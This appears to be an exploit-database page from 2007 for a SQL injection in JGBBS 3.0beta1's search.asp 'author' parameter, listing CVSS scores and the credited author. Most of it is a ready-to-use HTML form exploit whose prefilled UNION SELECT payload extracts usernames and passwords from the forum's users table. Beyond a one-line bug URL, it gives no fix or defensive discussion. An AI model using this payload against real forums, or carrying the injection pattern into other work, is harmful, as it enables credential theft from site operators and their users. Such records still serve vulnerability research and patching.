JGBBS 3.0beta1 Version Search.ASP "Author" SQL Injection Exploit

2007.03.20
Credit: UniquE-Key
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

JGBBS 3.0beta1 Version Search.ASP "Author" SQL Injection Exploit Type : SQL Injection Release Date : {2007-03-13} Product / Vendor : JGBBS Is a Tree-style Online Forum System http://sourceforge.net/projects/jgbbs/ Bug : http://localhost/script/search.asp?author=-SQL Inj.-&bid=0 SQL Injection Exploit : <title>JGBBS 3.0beta1 Version Search.ASP "Author" SQL Injection Exploit</title> <body bgcolor="#000000"> <form name="searchFrm" method="get" action="http://localhost/script/search.asp"> <table width="500" border="0" align="center"> <font face="Verdana" size="2" color="#FF0000"><b>JGBBS 3.0beta1 Version Search.ASP "Author" SQL Injection Exploit</b></font> <br> <tr> <td align="right"><font face="Arial" size="1" color="#00FF00">SQL Injection Code</td> <td> </td> <td><input name="author" type="text" value="UniquE-Key'UNION SELECT 0,1,user_password,3,4,5,user_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21 FROM users" class="inputbox" style="color: #000000" style="width:300px; "></td> </tr> <tr> <td align="right"><font face="Arial" size="1" color="#00FF00">Search Board</td> <td> </td> <td> <select name="bid"> <option value="0">(ALL)</option> </select> <input type="submit" value="Apply"> </td> </tr> </table> </form> <center><font face="Verdana" size="2" color="#FF0000"><b>UniquE-Key{UniquE-Cracker}</b></font> <br> <font face="Verdana" size="2" color="#FF0000"><b>UniquE (at) UniquE-Key (dot) ORG [email concealed]</b></font> <br> <font face="Verdana" size="2" color="#FF0000"><b>http://UniquE-Key.ORG</b></font></center> Tested : JGBBS 3.0beta1 Vulnerable : JGBBS 3.0beta1 Author : UniquE-Key{UniquE-Cracker} UniquE(at)UniquE-Key.Org http://www.UniquE-Key.Org


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top